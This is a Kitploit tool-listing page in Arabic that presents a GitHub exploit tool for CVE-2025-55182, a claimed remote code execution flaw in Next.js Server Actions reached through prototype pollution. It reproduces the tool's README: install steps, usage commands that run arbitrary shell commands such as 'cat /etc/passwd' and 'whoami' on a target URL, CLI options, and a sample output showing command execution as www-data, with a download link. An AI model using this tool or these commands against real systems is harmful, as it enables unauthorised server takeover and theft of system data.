Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2025-55182-node — CVE-2025-55182 Next.js RCE أداة استغلال | Kitploit
أدوات/GitHubGitHub/racall/cve-2025-55182-node
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubracall/cve-2025-55182-node

cve-2025-55182-node

CVE-2025-55182 Next.js RCE أداة استغلال

عرض المستودع
1منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

أداة استغلال RCE لـ CVE-2025-55182 في Next.js

الوثيقة الصينية | تحليل مبدأ الثغرة


[!CAUTION]

⚠️ إخلاء مسؤولية - اقرأ قبل الاستخدام

هذه الأداة مخصصة فقط لما يلي:

  • الباحثون الأمنيون الذين يجرون التحقق من الثغرات
  • اختبار الاختراق المصرح به بإذن صريح
  • الأغراض التعليمية والتعلمية

الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني.

باستخدام هذه الأداة، فإنك توافق على ما يلي:

  1. حصولك على الإذن المناسب قبل اختبار أي نظام
  2. عدم استخدام هذه الأداة لأغراض خبيثة
  3. تحملك المسؤولية الكاملة عن أفعالك وأي عواقب

لا يتحمل المؤلف أي مسؤولية عن سوء استخدام هذه الأداة.


أداة استغلال للتنفيذ عن بُعد (RCE) تستهدف ثغرة تلوث النموذج الأولي (prototype pollution) في جانب الخادم في Next.js.

نظرة عامة على الثغرة

CVE-2025-55182 هي ثغرة أمنية خطيرة تؤثر على Next.js وتسمح للمهاجمين بتحقيق تنفيذ عن بُعد للكود من خلال طلبات مُصممة خصيصًا تستغل تلوث النموذج الأولي (prototype pollution).

📖 للتحليل الفني المفصل، انظر EXPLOIT.md

الإصدارات المتأثرة

  • إصدارات محددة من Next.js (راجع النشرة الأمنية الرسمية)

كيف تعمل الثغرة

تستغل هذه الثغرة آلية معالجة طلبات Server Actions في Next.js، مما يحقق تنفيذًا تعسفيًا للكود من خلال تلويث سلسلة النموذج الأولي عبر __proto__ بالتزامن مع مُنشئ Function.

التثبيت

root@kitploit:~
# Using yarn
yarn install

# Using npm
npm install

الاستخدام

التنفيذ المباشر

root@kitploit:~
# Basic usage
node index.js <target_url> [command]

# Examples
node index.js http://localhost:3000
node index.js http://localhost:3000 "ls -la"
node index.js http://localhost:3000 "cat /etc/passwd"

استخدام سكربتات yarn

root@kitploit:~
# Run the tool
yarn start http://localhost:3000 "whoami"

# Or use alias
yarn exploit http://localhost:3000 "ls -la"

# Show help
yarn help

التثبيت الشامل لواجهة CLI

root@kitploit:~
# Link globally
yarn link
# or
npm link

# Then use the command directly
cve-2025-55182 http://localhost:3000
cve-2025-55182 http://localhost:3000 "whoami"

# Unlink
yarn unlink

خيارات CLI

root@kitploit:~
Usage:
  cve-2025-55182 <url> [command]

Arguments:
  url       Target URL (required)
  command   Command to execute (default: whoami)

Options:
  -h, --help     Show help message
  -v, --version  Show version number

تنسيق الإخراج

تُخرج الأداة النتائج بصيغة JSON:

تنفيذ ناجح

root@kitploit:~
{
  "success": true,
  "message": "",
  "data": "command execution result"
}

تنفيذ فاشل

root@kitploit:~
{
  "success": false,
  "message": "error message",
  "data": null
}

مثال

root@kitploit:~
$ cve-2025-55182 http://vulnerable-site.com "id"
{
  "success": true,
  "message": "",
  "data": "uid=1000(www-data) gid=1000(www-data) groups=1000(www-data)"
}

التبعيات

  • axios - عميل HTTP
  • form-data - مُنشئ FormData

المراجع

  • راجع سكربتات Python
تنزيل الأداة